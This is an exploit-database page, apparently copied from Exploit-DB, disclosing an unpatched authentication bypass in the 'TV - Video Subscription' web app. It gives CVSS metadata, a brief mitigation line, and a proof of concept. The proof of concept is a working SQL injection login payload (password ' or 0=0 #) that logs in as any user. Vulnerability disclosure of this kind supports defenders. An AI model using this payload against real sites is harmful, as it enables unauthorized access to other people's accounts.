header-logo
Suggest Exploit
vendor:
TV - Video Subscription
by:
Borna nematzadeh (L0RD)
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: TV - Video Subscription
Affected Version From: All version
Affected Version To: All version
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Webapps
2018

TV – Video Subscription – Authentication Bypass

With this exploit,attacker can login as any user without any authentication.

Mitigation:

Implement proper authentication and authorization mechanisms.
Source

Exploit-DB raw data:

# Exploit Title: TV - Video Subscription - Authentication Bypass
# Dork: N/A
# Date: 2018-02-14
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://codecanyon.net/item/tv-video-subscription/13966427?s_rank=1677
# Version: All version
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# With this exploit,attacker can login as any user without any
authentication.
# # # # #
# Proof of Concept :

1) Go to login page .

2) Username : anything@anything.anything
    Password : ' or 0=0 #